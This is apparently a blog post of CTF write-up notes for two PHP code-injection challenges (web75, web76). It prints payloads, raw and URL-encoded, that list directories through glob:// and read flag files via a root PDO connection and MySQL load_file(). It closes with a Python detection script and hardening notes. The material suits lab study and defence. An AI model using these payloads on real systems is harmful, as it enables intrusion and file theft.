web75-web76 notes (MySQL $dbh database connection)

web75

c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}exit();

bin dev etc flag36.txt home lib media mnt opt proc root run sbin srv sys tmp usr var

c=require("/flag36.txt");exit();

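OK, it threw an error, so it looks like require can't be used. I'll try include.

OK, that doesn't work either. I looked at the hint and found that it uses a database. I read 南神's blog; I can't follow how the flag is pulled out through MySQL, so I'm just taking the payload and moving on.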

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

This also has to be URL-encoded:

c=try%20%7B$dbh%20=%20new%20PDO('mysql:host=localhost;dbname=ctftraining',%20'root','root');foreach($dbh-%3Equery('select%20load_file(%22/flag36.txt%22)')%20as%20$row)%7Becho($row%5B0%5D).%22%7C%22;%20%7D$dbh%20=%20null;%7Dcatch%20(PDOException%20$e)%20%7Becho%20$e-%3EgetMessage();exit(0);%7Dexit(0);

Challenge hint:

c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().'');}exit(0);?>

# Scan with the payload to find flag36.txt

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

 

web76

c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().'');}exit(0);?>

# Scan with the payload to find flag36d.txt

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36d.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

c=try%20%7B$dbh%20=%20new%20PDO('mysql:host=localhost;dbname=ctftraining',%20'root','root');foreach($dbh-%3Equery('select%20load_file(%22/flag36d.txt%22)')%20as%20$row)%7Becho($row%5B0%5D).%22%7C%22;%20%7D$dbh%20=%20null;%7Dcatch%20(PDOException%20$e)%20%7Becho%20$e-%3EgetMessage();exit(0);%7Dexit(0);
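
From the defending side, both challenges leave the same traces in the request body: a `glob://` directory listing, then a PDO connection that runs `load_file()`. The sketch below is an added example, not part of the original notes or the challenge code; it URL-decodes each form parameter and matches those traces. The rule names, function names and sample bodies are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Patterns derived from the payloads in these notes; rule names are this example's own.
RULES = {
    "glob_dir_listing": re.compile(r"new\s+DirectoryIterator\s*\(\s*['\"]glob://", re.I),
    "pdo_mysql_connect": re.compile(r"new\s+PDO\s*\(\s*['\"]mysql:", re.I),
    "sql_load_file": re.compile(r"\bload_file\s*\(", re.I),
}

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_body(body):
    """Return the sorted names of all rules matched by any form parameter."""
    hits = set()
    # Split on '&' only: the PHP payloads are full of ';' and '=' characters.
    for pair in body.split("&"):
        _name, _, value = pair.partition("=")
        text = decode_fully(value)
        hits.update(name for name, rx in RULES.items() if rx.search(text))
    return sorted(hits)

# Constructed request bodies: shortened forms of the payloads above, one benign
# body, and one double-encoded variant.
SAMPLES = [
    "c=%24a%3Dnew%20DirectoryIterator('glob%3A%2F%2F%2F*')%3B",
    "c=try%20%7B$dbh%20=%20new%20PDO('mysql:host=localhost;dbname=ctftraining',"
    "%20'root','root');$dbh-%3Equery('select%20load_file(%22/flag36.txt%22)');%7D",
    "c=echo%20date('Y');&page=2",
    "c=select%2520load_file(%2522/flag36.txt%2522)",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_body(body) or "clean", "<-", body[:60])
```

Detection aside, `load_file()` is executed by the MySQL server, needs the FILE privilege, and is restricted by `secure_file_priv`. An application account that is not root and lacks FILE cannot be used to read files this way.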

posted @ 2025-03-15 18:59  justdoIT*